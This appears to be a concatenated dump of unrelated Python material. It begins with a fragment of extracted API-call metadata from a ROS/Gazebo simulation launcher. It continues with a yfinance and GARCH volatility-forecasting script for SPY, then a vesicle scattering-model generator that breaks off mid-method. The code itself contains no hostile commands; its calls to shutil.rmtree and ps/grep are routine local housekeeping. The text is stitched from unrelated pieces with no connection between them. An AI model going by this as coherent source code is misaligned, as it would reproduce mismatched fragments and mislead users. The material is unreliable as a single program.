'os.path.isdir', (['python_xterm_log_dir'], {}), '(python_xterm_log_dir)\n', (16798, 16820), False, 'import sys, os, os.path\n'), ((16822, 16855), 'os.makedirs', 'os.makedirs', (['python_xterm_log_dir'], {}), '(python_xterm_log_dir)\n', (16833, 16855), False, 'import sys, os, os.path\n'), ((18186, 18216), 'os.path.isfile', 'os.path.isfile', (['xterm_log_file'], {}), '(xterm_log_file)\n', (18200, 18216), False, 'import sys, os, os.path\n'), ((18367, 18389), 'subprocess.Popen', 'subprocess.Popen', (['args'], {}), '(args)\n', (18383, 18389), False, 'import subprocess, shlex\n'), ((18615, 18626), 'time.time', 'time.time', ([], {}), '()\n', (18624, 18626), False, 'import time\n'), ((18648, 18694), 'os.path.isfile', 'os.path.isfile', (["(FLAGS.log_folder + '/nn_ready')"], {}), "(FLAGS.log_folder + '/nn_ready')\n", (18662, 18694), False, 'import sys, os, os.path\n'), ((23467, 23511), 'numpy.random.uniform', 'np.random.uniform', (['(-FLAGS.x_var)', 'FLAGS.x_var'], {}), '(-FLAGS.x_var, FLAGS.x_var)\n', (23484, 23511), True, 'import numpy as np\n'), ((23518, 23562), 'numpy.random.uniform', 'np.random.uniform', (['(-FLAGS.y_var)', 'FLAGS.y_var'], {}), '(-FLAGS.y_var, FLAGS.y_var)\n', (23535, 23562), True, 'import numpy as np\n'), ((23569, 23613), 'numpy.random.uniform', 'np.random.uniform', (['(-FLAGS.z_var)', 'FLAGS.z_var'], {}), '(-FLAGS.z_var, FLAGS.z_var)\n', (23586, 23613), True, 'import numpy as np\n'), ((23622, 23670), 'numpy.random.uniform', 'np.random.uniform', (['(-FLAGS.yaw_var)', 'FLAGS.yaw_var'], {}), '(-FLAGS.yaw_var, FLAGS.yaw_var)\n', (23639, 23670), True, 'import numpy as np\n'), ((23841, 23876), 'os.path.isdir', 'os.path.isdir', (['gazebo_xterm_log_dir'], {}), '(gazebo_xterm_log_dir)\n', (23854, 23876), False, 'import sys, os, os.path\n'), ((23878, 23911), 'os.makedirs', 'os.makedirs', (['gazebo_xterm_log_dir'], {}), '(gazebo_xterm_log_dir)\n', (23889, 23911), False, 'import sys, os, os.path\n'), ((24356, 24380), 'os.path.isfile', 'os.path.isfile', (['fsm_file'], {}), '(fsm_file)\n', (24370, 24380), False, 'import sys, os, os.path\n'), ((24779, 24825), 'os.path.isfile', 'os.path.isfile', (["(FLAGS.log_folder + '/nn_ready')"], {}), "(FLAGS.log_folder + '/nn_ready')\n", (24793, 24825), False, 'import sys, os, os.path\n'), ((25779, 25817), 'rospy.has_param', 'rospy.has_param', (['"""/starting_positions"""'], {}), "('/starting_positions')\n", (25794, 25817), False, 'import rospy\n'), ((29998, 30013), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (30008, 30013), False, 'import time\n'), ((30502, 30513), 'time.time', 'time.time', ([], {}), '()\n', (30511, 30513), False, 'import time\n'), ((34050, 34063), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (34060, 34063), False, 'import time\n'), ((3241, 3296), 'subprocess.Popen', 'subprocess.Popen', (["['ps', '-ef']"], {'stdout': 'subprocess.PIPE'}), "(['ps', '-ef'], stdout=subprocess.PIPE)\n", (3257, 3296), False, 'import subprocess, shlex\n'), ((3310, 3385), 'subprocess.Popen', 'subprocess.Popen', (["['grep', 'gz']"], {'stdin': 'p_ps.stdout', 'stdout': 'subprocess.PIPE'}), "(['grep', 'gz'], stdin=p_ps.stdout, stdout=subprocess.PIPE)\n", (3326, 3385), False, 'import subprocess, shlex\n'), ((3422, 3437), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (3432, 3437), False, 'import time\n'), ((3888, 3943), 'subprocess.Popen', 'subprocess.Popen', (["['ps', '-ef']"], {'stdout': 'subprocess.PIPE'}), "(['ps', '-ef'], stdout=subprocess.PIPE)\n", (3904, 3943), False, 'import subprocess, shlex\n'), ((3957, 4049), 'subprocess.Popen', 'subprocess.Popen', (["['grep', 'create_dataset']"], {'stdin': 'p_ps.stdout', 'stdout': 'subprocess.PIPE'}), "(['grep', 'create_dataset'], stdin=p_ps.stdout, stdout=\n subprocess.PIPE)\n", (3973, 4049), False, 'import subprocess, shlex\n'), ((4081, 4096), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (4091, 4096), False, 'import time\n'), ((4408, 4421), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4418, 4421), False, 'import time\n'), ((4433, 4494), 'subprocess.call', 'subprocess.call', (["['rosparam', 'list']"], {'stdout': 'subprocess.PIPE'}), "(['rosparam', 'list'], stdout=subprocess.PIPE)\n", (4448, 4494), False, 'import subprocess, shlex\n'), ((10640, 10689), 'shlex.split', 'shlex.split', (['"""rospack find simulation_supervised"""'], {}), "('rospack find simulation_supervised')\n", (10651, 10689), False, 'import subprocess, shlex\n'), ((11584, 11632), 'shutil.rmtree', 'shutil.rmtree', (['(FLAGS.summary_dir + FLAGS.log_tag)'], {}), '(FLAGS.summary_dir + FLAGS.log_tag)\n', (11597, 11632), False, 'import shutil\n'), ((11686, 11732), 'shutil.rmtree', 'shutil.rmtree', (['(FLAGS.data_root + FLAGS.log_tag)'], {}), '(FLAGS.data_root + FLAGS.log_tag)\n', (11699, 11732), False, 'import shutil\n'), ((12493, 12620), 'shlex.split', 'shlex.split', (['"""cat $_CONDOR_JOB_AD | grep RemoteHost | head -1 | cut -d \'=\' -f 2 | cut -d \'@\' -f 2 | cut -d \'.\' -f 1)"""'], {}), '(\n "cat $_CONDOR_JOB_AD | grep RemoteHost | head -1 | cut -d \'=\' -f 2 | cut -d \'@\' -f 2 | cut -d \'.\' -f 1)"\n )\n', (12504, 12620), False, 'import subprocess, shlex\n'), ((14019, 14053), 'os.path.isdir', 'os.path.isdir', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14032, 14053), False, 'import sys, os, os.path\n'), ((14104, 14138), 'shutil.rmtree', 'shutil.rmtree', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14117, 14138), False, 'import shutil\n'), ((14148, 14182), 'os.path.isdir', 'os.path.isdir', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14161, 14182), False, 'import sys, os, os.path\n'), ((14188, 14220), 'os.makedirs', 'os.makedirs', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14199, 14220), False, 'import sys, os, os.path\n'), ((16029, 16059), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I%M"""'], {}), "('%Y-%m-%d_%I%M')\n", (16042, 16059), False, 'import time\n'), ((16098, 16123), 'os.remove', 'os.remove', (['xterm_log_file'], {}), '(xterm_log_file)\n', (16107, 16123), False, 'import sys, os, os.path\n'), ((18149, 18179), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I%M"""'], {}), "('%Y-%m-%d_%I%M')\n", (18162, 18179), False, 'import time\n'), ((18218, 18243), 'os.remove', 'os.remove', (['xterm_log_file'], {}), '(xterm_log_file)\n', (18227, 18243), False, 'import sys, os, os.path\n'), ((19727, 19754), 'rospy.get_param', 'rospy.get_param', (['"""recovery"""'], {}), "('recovery')\n", (19742, 19754), False, 'import rospy\n'), ((25201, 25212), 'sys.exit', 'sys.exit', (['(3)'], {}), '(3)\n', (25209, 25212), False, 'import sys, os, os.path\n'), ((25844, 25881), 'rospy.get_param', 'rospy.get_param', (['"""starting_positions"""'], {}), "('starting_positions')\n", (25859, 25881), False, 'import rospy\n'), ((26264, 26302), 'rospy.set_param', 'rospy.set_param', (['"""/evaluate"""', 'evaluate'], {}), "('/evaluate', evaluate)\n", (26279, 26302), False, 'import rospy\n'), ((26532, 26538), 'geometry_msgs.msg.Pose', 'Pose', ([], {}), '()\n', (26536, 26538), False, 'from geometry_msgs.msg import Pose\n'), ((26911, 26922), 'numpy.sin', 'np.sin', (['yaw'], {}), '(yaw)\n', (26917, 26922), True, 'import numpy as np\n'), ((26946, 26957), 'numpy.cos', 'np.cos', (['yaw'], {}), '(yaw)\n', (26952, 26957), True, 'import numpy as np\n'), ((27002, 27014), 'gazebo_msgs.msg.ModelState', 'ModelState', ([], {}), '()\n', (27012, 27014), False, 'from gazebo_msgs.msg import ModelState\n'), ((27162, 27184), 'gazebo_msgs.srv.SetModelStateRequest', 'SetModelStateRequest', ([], {}), '()\n', (27182, 27184), False, 'from gazebo_msgs.srv import SetModelStateRequest\n'), ((27289, 27340), 'rospy.set_param', 'rospy.set_param', (['"""starting_height"""', 'starting_height'], {}), "('starting_height', starting_height)\n", (27304, 27340), False, 'import rospy\n'), ((27418, 27431), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (27428, 27431), False, 'import time\n'), ((29528, 29550), 'subprocess.Popen', 'subprocess.Popen', (['args'], {}), '(args)\n', (29544, 29550), False, 'import subprocess, shlex\n'), ((29959, 29996), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + fsm_file)"], {}), "('stat -c %Y ' + fsm_file)\n", (29970, 29996), False, 'import subprocess, shlex\n'), ((32299, 32314), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (32309, 32314), False, 'import time\n'), ((32546, 32592), 'os.path.isfile', 'os.path.isfile', (["(FLAGS.log_folder + '/nn_ready')"], {}), "(FLAGS.log_folder + '/nn_ready')\n", (32560, 32592), False, 'import sys, os, os.path\n'), ((34201, 34235), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (34214, 34235), False, 'import time\n'), ((2547, 2564), 'yaml.load', 'yaml.load', (['stream'], {}), '(stream)\n', (2556, 2564), False, 'import yaml\n'), ((3134, 3168), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (3147, 3168), False, 'import time\n'), ((3775, 3809), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (3788, 3809), False, 'import time\n'), ((4642, 4676), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (4655, 4676), False, 'import time\n'), ((16324, 16358), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (16337, 16358), False, 'import time\n'), ((18472, 18506), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (18485, 18506), False, 'import time\n'), ((18741, 18800), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (18752, 18800), False, 'import subprocess, shlex\n'), ((19238, 19251), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (19248, 19251), False, 'import time\n'), ((19274, 19320), 'os.path.isfile', 'os.path.isfile', (["(FLAGS.log_folder + '/nn_ready')"], {}), "(FLAGS.log_folder + '/nn_ready')\n", (19288, 19320), False, 'import sys, os, os.path\n'), ((19327, 19340), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (19337, 19340), False, 'import time\n'), ((24870, 24929), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (24881, 24929), False, 'import subprocess, shlex\n'), ((25950, 25986), 'ast.literal_eval', 'ast.literal_eval', (['starting_positions'], {}), '(starting_positions)\n', (25966, 25986), False, 'import ast\n'), ((27557, 27571), 'std_srvs.srv.EmptyRequest', 'EmptyRequest', ([], {}), '()\n', (27569, 27571), False, 'from std_srvs.srv import EmptyRequest\n'), ((28088, 28116), 'os.path.isdir', 'os.path.isdir', (['data_location'], {}), '(data_location)\n', (28101, 28116), False, 'import sys, os, os.path\n'), ((28153, 28179), 'os.makedirs', 'os.makedirs', (['data_location'], {}), '(data_location)\n', (28164, 28179), False, 'import sys, os, os.path\n'), ((29378, 29412), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I-%M-%S"""'], {}), "('%Y-%m-%d_%I-%M-%S')\n", (29391, 29412), False, 'import time\n'), ((30082, 30116), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (30095, 30116), False, 'import time\n'), ((30631, 30668), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + fsm_file)"], {}), "('stat -c %Y ' + fsm_file)\n", (30642, 30668), False, 'import subprocess, shlex\n'), ((30936, 30950), 'time.sleep', 'time.sleep', (['(30)'], {}), '(30)\n', (30946, 30950), False, 'import time\n'), ((30997, 31008), 'time.time', 'time.time', ([], {}), '()\n', (31006, 31008), False, 'import time\n'), ((32709, 32720), 'time.time', 'time.time', ([], {}), '()\n', (32718, 32720), False, 'import time\n'), ((33474, 33485), 'sys.exit', 'sys.exit', (['(3)'], {}), '(3)\n', (33482, 33485), False, 'import sys, os, os.path\n'), ((4367, 4401), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (4380, 4401), False, 'import time\n'), ((14285, 14316), 'os.listdir', 'os.listdir', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14295, 14316), False, 'import sys, os, os.path\n'), ((18854, 18913), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (18865, 18913), False, 'import subprocess, shlex\n'), ((19220, 19231), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (19228, 19231), False, 'import sys, os, os.path\n'), ((19649, 19660), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (19657, 19660), False, 'import sys, os, os.path\n'), ((24447, 24481), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I-%M-%S"""'], {}), "('%Y-%m-%d_%I-%M-%S')\n", (24460, 24481), False, 'import time\n'), ((25143, 25177), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (25156, 25177), False, 'import time\n'), ((28118, 28146), 'shutil.rmtree', 'shutil.rmtree', (['data_location'], {}), '(data_location)\n', (28131, 28146), False, 'import shutil\n'), ((31036, 31047), 'time.time', 'time.time', ([], {}), '()\n', (31045, 31047), False, 'import time\n'), ((32635, 32694), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (32646, 32694), False, 'import subprocess, shlex\n'), ((32964, 32977), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (32974, 32977), False, 'import time\n'), ((33616, 33650), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (33629, 33650), False, 'import time\n'), ((18921, 18932), 'time.time', 'time.time', ([], {}), '()\n', (18930, 18932), False, 'import time\n'), ((19350, 19361), 'time.time', 'time.time', ([], {}), '()\n', (19359, 19361), False, 'import time\n'), ((20620, 20675), 'shlex.split', 'shlex.split', (['"""rospack find simulation_supervised_tools"""'], {}), "('rospack find simulation_supervised_tools')\n", (20631, 20675), False, 'import subprocess, shlex\n'), ((20715, 20779), 'shlex.split', 'shlex.split', (["('python ' + generator_file + ' ' + FLAGS.log_folder)"], {}), "('python ' + generator_file + ' ' + FLAGS.log_folder)\n", (20726, 20779), False, 'import subprocess, shlex\n'), ((22057, 22087), 'shlex.split', 'shlex.split', (['generator_command'], {}), '(generator_command)\n', (22068, 22087), False, 'import subprocess, shlex\n'), ((22230, 22241), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (22238, 22241), False, 'import sys, os, os.path\n'), ((30802, 30813), 'time.time', 'time.time', ([], {}), '()\n', (30811, 30813), False, 'import time\n'), ((30893, 30927), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (30906, 30927), False, 'import time\n'), ((31200, 31246), 'shlex.split', 'shlex.split', (['"""rostopic pub /go std_msgs/Empty"""'], {}), "('rostopic pub /go std_msgs/Empty')\n", (31211, 31246), False, 'import subprocess, shlex\n'), ((32771, 32805), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (32784, 32805), False, 'import time\n'), ((32899, 32958), 'shlex.split', 'shlex.split', (["('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')"], {}), "('stat -c %Y ' + FLAGS.log_folder + '/nn_ready')\n", (32910, 32958), False, 'import subprocess, shlex\n'), ((33241, 33252), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (33249, 33252), False, 'import sys, os, os.path\n'), ((33412, 33446), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (33425, 33446), False, 'import time\n'), ((19109, 19140), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M"""'], {}), "('%Y-%m-%d_%I:%M')\n", (19122, 19140), False, 'import time\n'), ((19538, 19569), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M"""'], {}), "('%Y-%m-%d_%I:%M')\n", (19551, 19569), False, 'import time\n'), ((28590, 28618), 'os.path.basename', 'os.path.basename', (['world_file'], {}), '(world_file)\n', (28606, 28618), False, 'import sys, os, os.path\n'), ((32989, 33000), 'time.time', 'time.time', ([], {}), '()\n', (32998, 33000), False, 'import time\n'), ((14455, 14486), 'os.listdir', 'os.listdir', (['FLAGS.data_location'], {}), '(FLAGS.data_location)\n', (14465, 14486), False, 'import sys, os, os.path\n'), ((21682, 21737), 'shlex.split', 'shlex.split', (['"""rospack find simulation_supervised_tools"""'], {}), "('rospack find simulation_supervised_tools')\n", (21693, 21737), False, 'import subprocess, shlex\n'), ((32124, 32158), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (32137, 32158), False, 'import time\n'), ((33152, 33186), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (33165, 33186), False, 'import time\n'), ((31753, 31787), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d_%I:%M:%S"""'], {}), "('%Y-%m-%d_%I:%M:%S')\n", (31766, 31787), False, 'import time\n'), ((31789, 31821), 'os.path.basename', 'os.path.basename', (['xterm_log_file'], {}), '(xterm_log_file)\n', (31805, 31821), False, 'import sys, os, os.path\n')]
|
import yfinance as yf
from datetime import datetime
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from arch import arch_model
from volatility.utils import get_percent_chg
start = datetime(2000, 1, 1)
end = datetime(2020, 9, 11)
symbol = 'SPY'
tickerData = yf.Ticker(symbol)
df = tickerData.history(period='1d', start=start, end=end)
get_percent_chg(df, 1)
get_percent_chg(df, 5)
get_percent_chg(df, 10)
get_percent_chg(df, 15)
get_percent_chg(df, 21)
returns = df.Close.pct_change().dropna()
df['ret_1a'] = returns
test_size = 365*5
test_size = 365
keyList = ['ret_1', 'ret_5', 'ret_10', 'ret_15', 'ret_21']
fig, ax = plt.subplots(figsize=(10, 5), nrows=5, ncols=1)
k = 0
for key in keyList:
returns = 100 * df[key].dropna()
predictions = []
print('key', key)
for i in range(test_size):
train = returns[:-(test_size-i)]
model = arch_model(train, p=2, q=2)
model_fit = model.fit(disp='off')
pred_val = model_fit.forecast(horizon=1)
predictions.append(np.sqrt(pred_val.variance.values[-1,:][0]))
predictions = pd.Series(predictions, index=returns.index[-test_size:])
ax[k].plot(returns[-test_size:], label=key, color='r')
ax[k].plot(predictions, label=key+' volpred', color='b')
ax[k].set_ylabel(key)
k += 1
ax[k-1].set_xlabel('Date')
plt.legend(['True Returns', 'Predicted Volatility'], loc=2, fontsize=8)
plt.show()
|
[
"datetime.datetime",
"pandas.Series",
"numpy.sqrt",
"arch.arch_model",
"volatility.utils.get_percent_chg",
"yfinance.Ticker",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] |
[((205, 225), 'datetime.datetime', 'datetime', (['(2000)', '(1)', '(1)'], {}), '(2000, 1, 1)\n', (213, 225), False, 'from datetime import datetime\n'), ((232, 253), 'datetime.datetime', 'datetime', (['(2020)', '(9)', '(11)'], {}), '(2020, 9, 11)\n', (240, 253), False, 'from datetime import datetime\n'), ((282, 299), 'yfinance.Ticker', 'yf.Ticker', (['symbol'], {}), '(symbol)\n', (291, 299), True, 'import yfinance as yf\n'), ((359, 381), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(1)'], {}), '(df, 1)\n', (374, 381), False, 'from volatility.utils import get_percent_chg\n'), ((382, 404), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(5)'], {}), '(df, 5)\n', (397, 404), False, 'from volatility.utils import get_percent_chg\n'), ((405, 428), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(10)'], {}), '(df, 10)\n', (420, 428), False, 'from volatility.utils import get_percent_chg\n'), ((429, 452), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(15)'], {}), '(df, 15)\n', (444, 452), False, 'from volatility.utils import get_percent_chg\n'), ((453, 476), 'volatility.utils.get_percent_chg', 'get_percent_chg', (['df', '(21)'], {}), '(df, 21)\n', (468, 476), False, 'from volatility.utils import get_percent_chg\n'), ((645, 692), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(10, 5)', 'nrows': '(5)', 'ncols': '(1)'}), '(figsize=(10, 5), nrows=5, ncols=1)\n', (657, 692), True, 'import matplotlib.pyplot as plt\n'), ((1336, 1407), 'matplotlib.pyplot.legend', 'plt.legend', (["['True Returns', 'Predicted Volatility']"], {'loc': '(2)', 'fontsize': '(8)'}), "(['True Returns', 'Predicted Volatility'], loc=2, fontsize=8)\n", (1346, 1407), True, 'import matplotlib.pyplot as plt\n'), ((1408, 1418), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1416, 1418), True, 'import matplotlib.pyplot as plt\n'), ((1095, 1151), 'pandas.Series', 'pd.Series', (['predictions'], {'index': 'returns.index[-test_size:]'}), '(predictions, index=returns.index[-test_size:])\n', (1104, 1151), True, 'import pandas as pd\n'), ((887, 914), 'arch.arch_model', 'arch_model', (['train'], {'p': '(2)', 'q': '(2)'}), '(train, p=2, q=2)\n', (897, 914), False, 'from arch import arch_model\n'), ((1033, 1076), 'numpy.sqrt', 'np.sqrt', (['pred_val.variance.values[-1, :][0]'], {}), '(pred_val.variance.values[-1, :][0])\n', (1040, 1076), True, 'import numpy as np\n')]
|
import numpy as np
import random
import numexpr as ne
def gen_layer(rin, rout, nsize):
R = 1.0
phi = np.random.uniform(0, 2*np.pi, size=(nsize))
costheta = np.random.uniform(-1, 1, size=(nsize))
u = np.random.uniform(rin**3, rout**3, size=(nsize))
theta = np.arccos( costheta )
r = R * np.cbrt( u )
x = r * np.sin( theta ) * np.cos( phi )
y = r * np.sin( theta ) * np.sin( phi )
z = r * np.cos( theta )
return( x, y, z )
def LPFbead(qrange, sigmabead):
'''
Compute the spherical form factor given a range of q values.
Parameters
----------
qrange: numpy.array
array of values in q-space to compute form factor for.
sigmabead: float
diameter of the sphere.
Return
-------
Fqb: numpy.array
array of values of the spherical form factors (F(q)) computed at q-points listed in qrange.
'''
R=np.true_divide(sigmabead,2)
QR=np.multiply(qrange,R)
Fqb=np.multiply(np.true_divide(np.sin(QR)-np.multiply(QR,np.cos(QR)),np.power(QR,3)),3)
return Fqb
def LPOmega(qrange, nAin, nAout, nB, r): # qvalues number_of_B number_of_A scatterer_coordinates
Ntot=nAin+nB+nAout # Total number of scatterers to loop through
omegaarrt=np.zeros((1,len(qrange))) # initiating array
omegaarr=np.zeros((1,len(qrange))) # initiating array
rur=r[0,:,:]# selects
rur=rur.transpose()
for i in range(Ntot-1): # loops through index and all further indexes to prevent double counting
all_disp = rur[i,:]-rur[(i+1):,:]
rij = np.sqrt(np.sum(np.square(all_disp),axis=1))
rij = rij.transpose()
rs = rij[:,np.newaxis] # reshapes array for consistency
Q = qrange[np.newaxis,:] # reshapes array for consistency
vals = ne.evaluate("sin(Q*rs)/(Q*rs)") # ne is efficient at calculations
inds=np.argwhere(np.isnan(vals)) # error catching in case there are NaN values
if len(inds)>0:
for val in inds:
vals[val[0],val[1]]=1
inds_double_check=np.argwhere(np.isnan(vals))
if len(inds_double_check)>0:
print('nan error!')
vals = ne.evaluate("sum((vals), axis=0)") # adds together scatterer contributions for each q value
omegaarr+=vals
omegaarr=np.true_divide(2*omegaarr,Ntot)+1 # 1 accounts for the guarenteed overlap of same bead # 2* accounts for double counting avoided to reduce computational expense by looping for all other pairs
omegaarrt+=omegaarr # stores values between loops
return omegaarrt
def visualize(r, Rcore, dR_Ain, dR_B, dR_Aout, sigmabead):
import py3Dmol
view = py3Dmol.view()
for ri in r[0,:,:].transpose():
if np.linalg.norm(ri) < Rcore+dR_Ain or np.linalg.norm(ri) > (Rcore+dR_Ain+dR_B):
col = 'blue'
else:
col = 'red'
view.addSphere(
{
'center': {'x': ri[0], 'y': ri[1], 'z': ri[2]},
'radius': sigmabead/2,
'color': col,
'alpha': 0.9,
}
)
#view.zoomTo()
view.show()
return view
def genLP(Rcore, dR_Ain, dR_B, dR_Aout, sigmabead, nAin, nAout, nB):
# core radius, inner A layer thickness, B layer thickness, outer A layer thickness,
# bead diameter, # of inner A beads, # of outer A beads, # of B beads
ntot = nAin+nB+nAout
power = 2
r = np.zeros((1, 3, ntot))
types = np.zeros((ntot))
### Create configuration for each replicate with dispersity ###
for step in range(0, 1):
### Populate A inner Layer ###
x, y, z = gen_layer(Rcore, Rcore+dR_Ain, nAin)
for i in range(nAin):
r[0,:,i] = [x[i], y[i], z[i]]
types[i] = 1
### Populate B middle Layer ###
x, y, z = gen_layer(Rcore+dR_Ain, Rcore+dR_Ain+dR_B, nB)
for i in range(nB):
r[0,:,i+nAin] = [x[i], y[i], z[i]]
types[i+nAin] = 2
### Populate A outer Layer ###
x, y, z = gen_layer(Rcore+dR_Ain+dR_B, Rcore+dR_Ain+dR_B+dR_Aout, nAout)
for i in range(nAout):
r[0,:,i+nAin+nB] = [x[i], y[i], z[i]]
types[i+nAin+nB] = 1
return r
class scatterer_generator:
'''
The wrapper class for vesicle shape. Default length unit: Angstrom.
Notes
-----
**The following 7 shape-specific descriptors are to be specified by user (see
*Attributes*) as
a list, in the precise order as listed, while calling `Model.load_shape`
to load this shape:**
num_scatterers:
Number of scatterers used to represent a chain. Default: 24
N:
Number of monomers in a chain. Default: 54
eta_B:
Packing fraction of scatterers in B layer. Default: 0.5
lmono_b:
Diameter of a monomer of chemistry B. Default: 50.4 A
lmono_a:
Diameter of a monomer of chemistry A. Default: 50.4 A
fb:
Fraction of monomers in chain that are of B type. fa = 1-fb. Default: 0.55
nLP:
Number of replicates for each individual. Default: 7
**The following 7 parameters are to be predicted, in the precise order
as listed, by GA:**
R_core:
Core radius. Default [min,max]: [50 A, 400 A]
t_Ain:
Thickness of inner A layer. Default [min,max]: [30 A, 200 A]
t_B:
Thickness of B layer. Default [min,max]: [30 A, 200 A]
t_Aout:
Thickness of outer A layer. Default [min,max]: [30 A, 200 A]
sigma_Ain:
Split of solvophilic scatterers between inner and outer layers.
Default [min,max]: [0.1, 0.45]
sigma_R:
Dispersity in vesicle size as implemented in the core radius.
Default [min,max]: [0.0, 0.45]
log10(bg):
Negative log10 of background intensity.
E.g. an background intensity of 0.001 leads to this value being 3.
Default [min,max]: [0.1,4]
See also
--------
crease_ga.Model.load_shape
'''
def __init__(self,
shape_params = [24,54,0.5,50.4,50.4,0.55,7],
minvalu = (50, 30, 30, 30, 0.1, 0.0, 0.1),
maxvalu = (400, 200, 200, 200, 0.45, 0.45, 4)):
num_scatterers = shape_params[0]
N = shape_params[1]
rho_B = shape_params[2]
lmono_a = shape_params[3]
lmono_b= shape_params[4]
fb = shape_params[5]
nLP = shape_params[6]
self._numvars = 7
self.minvalu = minvalu
self.maxvalu = maxvalu
self.num_scatterers=num_scatterers ## number of scatterers per chain
self.N=N ## Number of beads on chain
self.rho_B=rho_B ## density/volume fraction of beads in B layer
self.lmono_a=lmono_a ## Angstrom 'monomer contour length'
self.lmono_b=lmono_b ## Angstrom 'monomer contour length'
self.MB=np.pi/6*(self.lmono_b)**3 ## volume of B monomer
self.sigmabead=np.true_divide(self.N*self.lmono_b,self.num_scatterers) ## scatterer bead diameter
self.fb=fb ## fraction of B type monomers in chain
self.nLP=nLP ## number of replicates
@property
def numvars(self):
return self._numvars
def converttoIQ(self, qrange, param):
'''
Calculate computed scattering intensity profile.
Parameters
----------
qrange: numpy.array
q values.
param: numpy.array
Decoded input parameters. See *Notes* section of the class
documentation.
Returns
-------
IQid: A numpy array holding I(q).
'''
# q values, decoded parameters,
# number of repeat units per chain, fraction of B beads per chain, core density,
# scatterer diameter, molar mass of B chemistry,
# length of A chemistry bond, length of B chemistry bond,
# number of scatterers per chain, # of replicates, stdev in Rcore size
sigmabead = self.sigmabead
N = self.N
fb = self.fb
rho_B = self.rho_B
MB = self.MB
lmono_a = self.lmono_a
lmono_b = self.lmono_b
num_scatterers = self.num_scatterers
nLP = self.nLP
